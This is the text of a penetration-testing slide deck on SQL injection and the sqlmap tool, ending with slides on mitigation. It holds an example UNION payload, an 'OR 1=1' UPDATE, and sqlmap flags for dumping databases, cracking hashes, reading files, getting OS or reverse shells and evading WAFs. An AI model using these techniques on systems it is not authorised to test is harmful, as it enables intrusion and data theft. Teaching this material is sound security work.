1. SQL injection with sqlmap
Herman Duarte <hcoduarte@gmail.com>
Tuesday, December 4, 12 1
2. About me
Consultant @ INTEGRITY S.A. - www.integrity.pt
Penetration testing engagements
BSc in Information Systems and Computer Engineering
CISSP Associate / ISO27001LA / CCNA
Security addict :)
Tuesday, December 4, 12 2
4. SQLi 101: Definition
Definition:
SQL injection occurs when it is possible to inject SQL
commands in data-plane input in order to affect the
execution of predefined SQL statements
It affects any application that uses non-sanitized user-supplied
input, in dynamic SQL query constructions (e.g. web apps, fat
clients)
Cause:
Bad programming practices + Lack of knowledge/
awareness
Tuesday, December 4, 12 4
5. SQLi 101: Structure
...?name=robert’ union all select null,@@version,null #
Prefix Payload Suffix
$query = “SELECT name,status,age FROM user WHERE
name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”;
Tuesday, December 4, 12 5
6. sqlmap
Developed in python
Prerequisites to run sqlmap:
Python 2.6.x or 2.7.x
To install:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap
To update:
python sqlmap.py --update
git pull
Tuesday, December 4, 12 6
7. sqlmap
Mainly developed by:
Bernardo Damele A.G. Miroslav Stampar
(@inquisb) (@stramparm)
Tuesday, December 4, 12 7
8. sqlmap: Scenarios
Find and explore SQL injection in web applications
Direct connection (database account is needed)
DBMS python binding installed (e.g. PyMySQL)
-d <dbms>://<user>:<password>@<ip>:<port>/<db_name>
Tuesday, December 4, 12 8
9. sqlmap: Workflow
Select your target
Identify possible injection points
Identify SQLi vulnerabilities:
By using sqlmap
Manual testing :)
Exploit SQLi vunerabilities:
Enumerate
File system access
OS pwnage
Own the internal network (w00t! w00t!)
Tuesday, December 4, 12 9
11. sqlmap: Injection points
GET parameters
POST parameters
Cookie header values (only if --level >= 2)
User-Agent header value (only if --level >= 3)
Referer header value (only if --level >= 3)
Tuesday, December 4, 12 11
12. sqlmap: Finding SQLi (I)
./sqlmap.py -u “https://webapp.com/news.php?id=1”
or
./sqlmap.y -r news_get_request --force-ssl
Default behavior:
Tests all GET and/or POST parameters, for all SQLi
types, for all databases (if not discovered during tests)
Yes it may take a long time, and it doesn’t cover all tests
sqlmap can do.
Tuesday, December 4, 12 12
13. sqlmap: Finding SQLi (II)
--level=<level> (1...5 - default is 1)
With --level=5 every combination of payload, prefix and suffix
will be tested on all injection points available (noisier but gives
more coverage)
--risk=<risk> (0...3) - default is 1)
To do tests using OR --risk=3. Why? Imagine this:
UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1#
-p <param to test>[, <param to test>]
Tuesday, December 4, 12 13
14. sqlmap: SQLi techniques/types
--technique=SU (default is all of them: BEUST)
Boolean-based blind
Based on page changes, data is inferred, char by char
Error-based
Uses the errors that are displayed to extract data
Union query-based
Changes the SQL queries to extract data
Stacked queries
Semi-colon are used to inject multiple statements on the SQL query
Time-based blind
Based on time, data is inferred, char by char
Tuesday, December 4, 12 14
15. sqlmap: Supported DBMSs
--dbms=mssql | mysql | postgresql | oracle ...
Microsoft SQL Server SAP MaxDB
MySQL Sybase
PostgreSQL Firebird
Oracle SQLite
IBM DB2 Microsoft Access
Tuesday, December 4, 12 15
16. sqlmap: Logging / Verbosity
Logs all HTTP traffic in a text file: -t <output file>
Save options used in command line: --save <file>
Verbosity :
-v <0..6> (default 1)
-v 6 same as -t but, output to console
Tuesday, December 4, 12 16
17. sqlmap: Enumeration (I)
Objective:
Get data from the DBMS tables (limited the privileges the current
DBMS user have)
What can you get:
DBMS exact version, O.S. information, architecture and patch level: -f
DBMS banner: -b
DBMS server hostname: --hostname
DBMS user the application is using: --current-user
Applications current DB: --current-db
If the current user is a DBA: --is-dba
Tuesday, December 4, 12 17
18. sqlmap: Enumeration (II)
What can you get:
...
List the DBMS users: --users
List all DBMS users, password hashes: --passwords
sqlmap will automatically try to crack the hashes with a dictionary
attack
List users privileges: --privileges
List all available databases: --dbs
List all tables or just for a specific database:
--tables (-D <database name>)
Tuesday, December 4, 12 18
19. sqlmap: Enumeration (III)
What can you get:
...
List all columns or just for a specific table from that database:
--columns (-T <table name> -D <db name>)
Count table entries: --count
Dump data from a database/table/column:
--dump (-D, -T, -C can be used to select what data to dump)
--dump-all (I don’t recommend it)
Search for a specific or part of a database name, table name or column
name:
--search= (-D, -T, -C to specify what to search)
Tuesday, December 4, 12 19
20. sqlmap: Enumeration (IV)
What can you get:
...
Executing a custom SQL query:
--sql-query=”<sql query to execute>”
Interactive SQL shell to execute all your custom
SQL queries:
--sql-shell
Tuesday, December 4, 12 20
21. sqlmap: File system access
Objective:
Read and write any textual or binary file from the DBMS O.S.
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
Read:
--file-read=”<file path>”
Write:
--file-write=”<file local path>”
--file-dest=”<remote file location path>”
Tuesday, December 4, 12 21
22. sqlmap: OS pwnage (I)
Objective:
Get access to the DBMS O.S. and the Internal network (if DBMS server in the
internal network)
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
What can you do?
Get a reverse shell if the DB can:
connect to the internet
ping your server (yes an icmp shell :))
Establish a VNC connection
Tuesday, December 4, 12 22
23. sqlmap: OS pwnage (II)
To execute an OS command:
--os-cmd=”<command to execute>”
To get an OS shell: --os-shell
To get a meterpreter shell, an icmpshell or VNC:
--os-pwn
--msf-path=”<msf path>”
Store procedure privilege escalation (buffer overflow):
--bof
Tuesday, December 4, 12 23
24. sqlmap: Tamper scripts
Tamper scripts:
--tamper <script file path>[,<script file path>]
tamper/bluecoat.py
def tamper(payload, headers=None):
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL, Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
if payload:
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload)
retVal = re.sub(r"s*=s*", " LIKE ", retVal)
Tuesday, December 4, 12 24
26. sqlmap: Tips
If HTTPS is being used, don’t forget to set: --force-ssl
Get the most info as you can before starting to find SQLi
vulnerabilities. It will save you time.
Union-based gives more data with less requests, use it
Time-based blind SQLi is faster to check in comparison to
Union-based query (in cases where a lot of columns are
used)
If --is-dba=true, --technique=S you can start to gangnam
style
Tuesday, December 4, 12 26
27. Mitigation Techniques
Sanitize input
Use prepared statements / bind variables
Configure DBMS users configured with least-privilege
principle in mind
Use generic errors don’t pass them to the user
In case the web application source code can’t be
changed, a proxy can be used, between the web
server and the database server (e.g. GreenSQL)
Tuesday, December 4, 12 27
28. Wrap-up
Input sanitization
Use prepared statements
Least-privilege principle is your friend (use it!)
Have I said to use prepared statements ?! :)
Do code reviews
Tuesday, December 4, 12 28
29. References
https://sqlmap.org
Advanced SQL injection to operating system full
control - http://www.slideshare.net/inquis/advanced-
sql-injection-to-operating-system-full-control-
whitepaper-4633857
SQL Injection Attacks and Defenses - http://
www.amazon.com/Injection-Attacks-Defense-Justin-
Clarke/dp/1597494240
Tuesday, December 4, 12 29
30. Thank You!
Q&A
Herman Duarte
@hdontwit
https://www.linkedin.com/in/hcoduarte
hcoduarte@gmail.com
Tuesday, December 4, 12 30